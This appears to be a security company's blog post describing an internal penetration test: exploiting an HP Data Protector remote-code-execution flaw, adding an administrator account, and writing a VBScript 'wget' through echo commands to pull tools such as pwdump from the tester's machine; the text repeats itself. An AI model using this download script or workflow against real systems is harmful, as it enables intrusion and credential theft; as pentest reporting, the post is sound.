May 15, 2018

WGET FOR WINDOWS

Application Security

Wget For Windows

Pentesting in , different environments, brings in various challenges. I would like to share my experience with a recent internal network assessment, the challenges I faced and how I was able to get over.

So as usual the pentest started with scanning the various networks. Apart from a few Cisco default credentials, there was nothing more in the environment that could give me something juicy. Finally one of my scans revealed that a few of the systems was vulnerable to the HP Data Protector Remote Code execution. Thank you Lord!!!

I quickly fired up metasploit and used a meterpreter payload and NOTHING!!.. Not to worry.

Wget For Windows

I quickly fired up metasploit and used a meterpreter payload and NOTHING!!.. Not to worry.

"If you don’t have it create it

I downloaded the python exploit from exploit-db and boom RCE.

Next I checked the privileges this service was running with. Administrator ☺

Made user on the system and added the user to the administrators group and the Remote Desktop Users group.

Now that I was in the box I wanted to dump the passwords using pwdump.exe , but for some reason copy and paste wasn’t working. Now there are two ways to go about this problem and both involve using our attacking machine as a server.

I always use “python –m SimpleHTTPServer 80” to serve my exploits. So I opened the browser to connect to my attacking machine. The browser wouldn’t connect to my machine.

Now a linux box comes with various command line browsers/tools like curl, wget, fetch, scp. Someone famous once said “ If you don’t have it create it”. Create our own wget on windows.

echo strUrl = WScript.Arguments.Item(0) > wget.vbs

echo StrFile = WScript.Arguments.Item(1) >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs

echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs

echo Err.Clear >> wget.vbs

echo Set http = Nothing >> wget.vbs

echo Set http = CreateObject(“WinHttp.WinHttpRequest.5.1”) >> wget.vbs

echo If http Is Nothing Then Set http = CreateObject(“WinHttp.WinHttpRequest”) >> wget.vbs

echo If http Is Nothing Then Set http = CreateObject(“MSXML2.ServerXMLHTTP”) >> wget.vbs

echo If http Is Nothing Then Set http = CreateObject(“Microsoft.XMLHTTP”) >> wget.vbs

echo http.Open “GET”, strURL, False >> wget.vbs

echo http.Send >> wget.vbs

echo varByteArray = http.ResponseBody >> wget.vbs

echo Set http = Nothing >> wget.vbs

echo Set fs = CreateObject(“Scripting.FileSystemObject”) >> wget.vbs

echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs

echo strData = “” >> wget.vbs

echo strBuffer = “” >> wget.vbs

echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs

echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs

echo Next >> wget.vbs

echo ts.Close >> wget.vbs

Now that your have your own wget you can get over the restrictions put on the browser to download all the exploits you want.

Happy Hacking ☺

"If you don’t have it create it

I downloaded the python exploit from exploit-db and boom RCE.

Next I checked the privileges this service was running with. Administrator ☺

Made user on the system and added the user to the administrators group and the Remote Desktop Users group.

I always use “python –m SimpleHTTPServer 80” to serve my exploits. So I opened the browser to connect to my attacking machine. The browser wouldn’t connect to my machine.

Now a linux box comes with various command line browsers/tools like curl, wget, fetch, scp. Someone famous once said “ If you don’t have it create it”. Create our own wget on windows.

echo strUrl = WScript.Arguments.Item(0) > wget.vbs

echo StrFile = WScript.Arguments.Item(1) >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs

echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs

echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs

echo Err.Clear >> wget.vbs

echo Set http = Nothing >> wget.vbs

echo Set http = CreateObject(“WinHttp.WinHttpRequest.5.1”) >> wget.vbs

echo If http Is Nothing Then Set http = CreateObject(“WinHttp.WinHttpRequest”) >> wget.vbs

echo If http Is Nothing Then Set http = CreateObject(“MSXML2.ServerXMLHTTP”) >> wget.vbs

echo If http Is Nothing Then Set http = CreateObject(“Microsoft.XMLHTTP”) >> wget.vbs

echo http.Open “GET”, strURL, False >> wget.vbs

echo http.Send >> wget.vbs

echo varByteArray = http.ResponseBody >> wget.vbs

echo Set http = Nothing >> wget.vbs

echo Set fs = CreateObject(“Scripting.FileSystemObject”) >> wget.vbs

echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs

echo strData = “” >> wget.vbs

echo strBuffer = “” >> wget.vbs

echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs

echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs

echo Next >> wget.vbs

echo ts.Close >> wget.vbs

Now that your have your own wget you can get over the restrictions put on the browser to download all the exploits you want. ☺

Happy Hacking ☺

Android App to Remote Shell

May 21, 2018

Injection Flaws

May 13, 2018

NESA UAE Information Assurance Standards

May 13, 2018

Solutions

Network and Infrastructure Security
Zero Trust and Private Access
Endpoint and Server Protection
Vulnerability and Patch Management
Data Protection
Application Security
Secure Software and DevSecOps
Cloud Security
Identity Access Governance
Governance, Risk and Compliance
Security Intelligence Operations
Incident Response

Industry

Critical Infrastructure
Education
Energy and Utilities
Enterprise and Service Providers
Financial Services and FinTech
Government
Healthcare and BioTech
Legal
Manufacturing
Media and Entertainment
Retail and Ecommerce
Technology and Digital

Accreditations

Dubai

Office 4, Oasis Center
Sheikh Zayed Road
PO Box 128698
Dubai, UAE

+971 4 3383365
[email protected]

Abu Dhabi

Office 7, Floor 14
Makeen Tower, Al Mawkib St.
Al Zahiya Area
Abu Dhabi, UAE

+971 2 6573566
[email protected]

Kuwait

Mezzanine Floor, Tower 3
Mohammad Thunayyan Al-Ghanem Street, Jibla
Kuwait City, Kuwait

+971 4 3383365
[email protected]

London

160 Kemp House, City Road
London, EC1V 2NX
United Kingdom
Company Number: 10276574

+44 20 3287 3942
[email protected]

The website is our proprietary property and all source code, databases, functionality, software, website designs, audio, video, text, photographs, icons and graphics on the website (collectively, the “Content”) are owned or controlled by us or licensed to us, and are protected by copyright laws and various other intellectual property rights. The content and graphics may not be copied, in part or full, without the express permission of DTS Solution LLC (owner) who reserves all rights.

DTS Solution, DTS-Solution.com, the DTS Solution logo, HAWKEYE, FYNSEC, FRONTAL, HAWKEYE CSOC WIKI and Firewall Policy Builder are registered trademarks of DTS Solution, LLC.

WGET FOR WINDOWS

Wget For Windows

Wget For Windows

"If you don’t have it create it

Happy Hacking ☺

"If you don’t have it create it

Happy Hacking ☺

Android App to Remote Shell

May 21, 2018

Injection Flaws

May 13, 2018

NESA UAE Information Assurance Standards

May 13, 2018

Solutions

Industry

Services

Products

Other

Accreditations

Accreditations